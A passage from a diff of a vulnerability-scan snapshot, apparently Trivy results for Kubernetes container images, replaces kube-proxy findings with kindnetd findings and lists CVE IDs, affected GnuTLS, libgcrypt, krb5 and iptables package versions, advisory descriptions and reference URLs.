"https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://dev.gnupg.org/T5328", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://dev.gnupg.org/T5466", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-24659", - "installedVersion": "3.6.7-4+deb10u6", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - "https://access.redhat.com/security/cve/CVE-2020-24659", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", - "https://gitlab.com/gnutls/gnutls/-/issues/1071", - "https://linux.oracle.com/cve/CVE-2020-24659.html", - "https://linux.oracle.com/errata/ELSA-2020-5483.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", - "https://security.gentoo.org/glsa/202009-01", - "https://security.netapp.com/advisory/ntap-20200911-0006/", - "https://ubuntu.com/security/notices/USN-4491-1", - "https://usn.ubuntu.com/4491-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-24659", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-24659", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-24659", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", - }, - { - "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202009-01", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4491-1", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4491-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "3.7.1-5+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-2509", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "https://access.redhat.com/errata/RHSA-2022:6854", @@ -159114,7 +159465,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Double free during gnutls_pkcs7_verify", "references": [ @@ -159211,10 +159562,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "3.7.1-5+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0361", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "https://access.redhat.com/errata/RHSA-2023:1141", @@ -159242,7 +159593,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "timing side-channel in the TLS RSA key exchange code", "references": [ @@ -159339,10 +159690,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "3.7.1-5+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-4209", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "https://access.redhat.com/security/cve/CVE-2021-4209", @@ -159360,7 +159711,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "GnuTLS: Null pointer dereference in MD_UPDATE", "references": [ @@ -159418,9 +159769,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2011-3389", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", @@ -159524,7 +159875,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", "references": [ @@ -159925,309 +160276,450 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5800-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": 